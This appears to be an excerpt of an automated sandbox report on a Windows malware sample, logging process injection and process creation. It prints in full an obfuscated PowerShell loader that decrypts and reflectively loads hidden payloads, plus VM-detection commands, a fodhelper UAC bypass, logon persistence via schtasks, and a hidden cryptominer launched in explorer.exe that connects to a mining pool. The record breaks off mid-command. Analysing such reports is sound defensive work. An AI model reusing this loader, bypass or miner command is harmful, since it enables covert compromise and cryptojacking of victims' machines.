Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1010000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 280C22F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1FB970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 25EE91B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1AD31C90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226AD1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 138D43C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 236C6DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 15829E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D643A60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDEB370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F41AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20631820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 19C5BA20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DE98F00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1CCE3640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1858EA10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 228C25A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2942EBE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 23D96450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C8A0380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 26D9F390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1E5EF030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 248D2920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 21C0EE50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43B8A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43BA00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 165EDA50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe"
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Users\user\AppData\Local\Temp\paint.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 
'c:\users\user\appdata\local\temp\b.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 
